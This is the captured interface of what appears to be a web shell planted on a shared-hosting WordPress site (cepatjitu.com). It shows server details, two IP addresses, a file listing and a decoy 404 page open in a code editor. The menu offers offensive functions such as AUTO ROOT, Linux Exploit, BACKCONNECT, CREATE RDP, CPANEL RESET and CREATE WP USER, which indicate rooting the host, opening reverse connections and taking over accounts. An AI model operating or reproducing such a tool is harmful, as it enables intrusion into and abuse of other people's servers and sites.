Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
cepatjitu.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
24f2f
[ DIR ]
dr-xr-xr-x
a6be11
[ DIR ]
drwxr-xr-x
cgi.bin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
1.13
KB
-r-xr-xr-x
.index.php
1.62
KB
-rw-r--r--
index.html0
1.2
KB
-rw-r--r--
robots.txt
364
B
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.html0
<!DOCTYPE html> <html lang="id"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 - Halaman Tidak Ditemukan</title> <style> body { margin: 0; padding: 0; background: #f7f7f7; font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; display: flex; align-items: center; justify-content: center; height: 100vh; text-align: center; color: #333; } .container { max-width: 600px; } h1 { font-size: 6rem; margin: 0; color: #121212; } p { font-size: 1.2rem; } a { display: inline-block; margin-top: 20px; padding: 12px 24px; background-color: #121212; color: white; text-decoration: none; border-radius: 8px; transition: background-color 0.3s ease; } a:hover { background-color: #e04848; } @media (max-width: 600px) { h1 { font-size: 4rem; } } </style> </head> <body> <div class="container"> <h1>404</h1> <p>Maaf, halaman yang Anda cari tidak ditemukan.</p> <a href="/">Kembali ke Beranda</a> </div> </body> </html>
Close